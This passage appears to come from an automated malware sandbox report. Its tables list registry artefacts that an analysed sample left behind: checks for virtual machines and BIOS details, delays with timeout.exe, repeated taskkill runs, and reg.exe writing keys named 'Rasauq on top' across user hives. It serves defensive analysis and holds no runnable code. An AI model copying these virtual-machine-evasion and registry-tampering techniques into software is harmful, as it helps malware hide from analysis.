| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{0C08449F-748C-43B8-9D42-0B68F9D4E018} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
